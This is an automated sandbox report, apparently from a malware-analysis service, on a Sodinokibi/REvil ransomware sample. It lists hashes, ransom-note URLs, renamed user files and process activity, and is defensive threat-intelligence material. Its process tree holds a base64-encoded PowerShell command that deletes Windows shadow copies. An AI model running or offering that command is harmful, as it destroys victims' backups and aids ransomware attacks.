Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
25-08-2020 12:17
Static task
static1
Behavioral task
behavioral1
Sample
55.exe
Resource
win7
Behavioral task
behavioral2
Sample
55.exe
Resource
win10v200722
General
-
Target
55.exe
-
Size
289KB
-
MD5
500286eaf9eb11b34eb413bb0df5543b
-
SHA1
b889ff1138b2bd7a3033ca4c4868189dc8588f9b
-
SHA256
f67d2bb9157ba5ccacbe051ac737812226fb2b43fe209867ae276695a8a929a4
-
SHA512
65ce297688900f0c7b1eb3a327771eff79e366290761613b364f463787f66a46d14127e1a644b5fb8f26befdf90ce100110cf47107b9457f971ca8056402782a
Malware Config
Extracted
C:\x16q8vngrn-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B6E9B7957F638FA
http://decryptor.cc/5B6E9B7957F638FA
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
55.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\EditOut.tiff 55.exe File renamed C:\Users\Admin\Pictures\InitializeInvoke.crw => \??\c:\users\admin\pictures\InitializeInvoke.crw.x16q8vngrn 55.exe File renamed C:\Users\Admin\Pictures\ExportEnter.raw => \??\c:\users\admin\pictures\ExportEnter.raw.x16q8vngrn 55.exe File renamed C:\Users\Admin\Pictures\UnprotectUnregister.raw => \??\c:\users\admin\pictures\UnprotectUnregister.raw.x16q8vngrn 55.exe File opened for modification \??\c:\users\admin\pictures\ConnectRename.tiff 55.exe File renamed C:\Users\Admin\Pictures\ConnectRename.tiff => \??\c:\users\admin\pictures\ConnectRename.tiff.x16q8vngrn 55.exe File renamed C:\Users\Admin\Pictures\LimitExpand.tiff => \??\c:\users\admin\pictures\LimitExpand.tiff.x16q8vngrn 55.exe File renamed C:\Users\Admin\Pictures\SelectDeny.tif => \??\c:\users\admin\pictures\SelectDeny.tif.x16q8vngrn 55.exe File renamed C:\Users\Admin\Pictures\EditOut.tiff => \??\c:\users\admin\pictures\EditOut.tiff.x16q8vngrn 55.exe File opened for modification \??\c:\users\admin\pictures\LimitExpand.tiff 55.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
55.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dnmsg017q3za.bmp" 55.exe -
Drops file in Program Files directory 16 IoCs
Processes:
55.exedescription ioc process File opened for modification \??\c:\program files\RemoveUse.snd 55.exe File opened for modification \??\c:\program files\EditRename.kix 55.exe File opened for modification \??\c:\program files\GetResize.eps 55.exe File opened for modification \??\c:\program files\ProtectExpand.docm 55.exe File opened for modification \??\c:\program files\RestartClose.xml 55.exe File opened for modification \??\c:\program files\SelectExport.pptx 55.exe File opened for modification \??\c:\program files\SetShow.xht 55.exe File created \??\c:\program files\x16q8vngrn-readme.txt 55.exe File opened for modification \??\c:\program files\EnterMount.vsx 55.exe File opened for modification \??\c:\program files\ReceiveStep.tif 55.exe File opened for modification \??\c:\program files\DisableFormat.i64 55.exe File opened for modification \??\c:\program files\SaveSkip.pptx 55.exe File opened for modification \??\c:\program files\UnpublishConvertTo.svgz 55.exe File created \??\c:\program files (x86)\x16q8vngrn-readme.txt 55.exe File opened for modification \??\c:\program files\ConnectRegister.html 55.exe File opened for modification \??\c:\program files\RevokeDisconnect.midi 55.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
55.exepowershell.exepid process 580 55.exe 580 55.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
55.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 580 55.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeBackupPrivilege 2504 vssvc.exe Token: SeRestorePrivilege 2504 vssvc.exe Token: SeAuditPrivilege 2504 vssvc.exe Token: SeTakeOwnershipPrivilege 580 55.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
firefox.exepid process 260 firefox.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
55.exefirefox.exefirefox.exedescription pid process target process PID 580 wrote to memory of 852 580 55.exe powershell.exe PID 580 wrote to memory of 852 580 55.exe powershell.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 856 wrote to memory of 260 856 firefox.exe firefox.exe PID 260 wrote to memory of 3652 260 firefox.exe firefox.exe PID 260 wrote to memory of 3652 260 firefox.exe firefox.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\55.exe"C:\Users\Admin\AppData\Local\Temp\55.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:884
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:260 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="260.0.1971403473\1161750959" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1512 -prefsLen 1 -prefMapSize 219546 -appdir "C:\Program Files\Mozilla Firefox\browser" - 260 "\\.\pipe\gecko-crash-server-pipe.260" 1612 gpu3⤵PID:3652